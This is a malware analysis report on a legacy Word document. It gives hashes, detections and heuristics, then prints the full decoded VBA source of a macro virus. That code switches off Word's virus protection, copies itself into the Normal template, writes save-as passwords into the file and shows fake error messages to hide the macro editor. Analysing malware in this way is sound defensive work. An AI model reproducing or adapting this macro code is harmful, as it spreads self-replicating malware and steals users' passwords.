Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 132bea463c552132…

MALICIOUS

Office (OLE)

37.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5a75271f0b9577eaaec7157ac9b6bb41 SHA-1: 94df74d07de5680260923c862452914653df9f82 SHA-256: 132bea463c552132f14930a9d71c3563bcaf7cecd5e1ec55373c66bd9a4e8085
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for malware execution upon opening. The macro attempts to copy itself to the Normal template and the current document, indicating a persistence mechanism. The ClamAV detection 'Doc.Trojan.Visor-1' further supports its malicious nature. The macro's functionality is primarily focused on self-propagation within the Office environment.

Heuristics 5

  • ClamAV: Doc.Trojan.Visor-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Visor-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2354 bytes
SHA-256: a1636e7bc936ac720091b593c72b0d4f1ada1d5db2247b8ca2ca06ad627110c3
Detection
ClamAV: Doc.Trojan.Visor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Supervisor1"

Sub AutoNew()
MacroCopy
End Sub

Sub AutoOpen()
MacroCopy
End Sub

Function MacroCopy()
Dim DocumentInstalled, GlobalInstalled As Boolean
Dim i, x As Integer

On Error GoTo hups
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
DocumentInstalled = False
GlobalInstalled = False

For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Supervisor1" Then
       DocumentInstalled = True
    End If
Next

For x = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(x).Name = "Supervisor1" Then
       GlobalInstalled = True
    End If
Next

If DocumentInstalled = False Then
   Application.OrganizerCopy Source:=NormalTemplate.FullName, _
   Destination:=ActiveDocument.FullName, Name:="Supervisor1", _
   Object:=wdOrganizerObjectProjectItems
End If

If GlobalInstalled = False Then
   Application.OrganizerCopy Source:=ActiveDocument.FullName, _
   Destination:=NormalTemplate.FullName, Name:="Supervisor1", _
   Object:=wdOrganizerObjectProjectItems
End If

hups:
End Function

Function PWL()
Dim dlg

On Error GoTo hups:
Set dlg = Dialogs(wdDialogFileSaveAs)
 Open ActiveDocument.FullName For Append As #1
 Print #1, "GPPW_" & dlg.Password & "GPWPW_" & _
           dlg.WritePassword
 Close #1
 ActiveDocument.Save
hups:
End Function

Sub ToolsMacro()
MsgBox "Die angeforderte Application verursacht einen ungültigen Fehler im Modul 'Off97_bb.dll'" & Chr(13) & _
       "Bitte beheben Sie den Fehler und versuchen Sie es noch einmal.", vbCritical + vbOKOnly, "Microsoft Word"
End Sub

Sub Toolscustomize()
ToolsMacro
End Sub

Sub ViewVBcode()
ToolsMacro
End Sub

Sub PayLoad()
'Autor: Supervisor
'Herkunft: Österreich
'Datum: 1997-10-30

'An ALLE Viren-Freaks:
'Der Virus ist ein Passwort-Dieb der 1.Generation
'freut auch auf die 2.Generation!
'Spruch des Tages: "Wissen ist Macht"

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.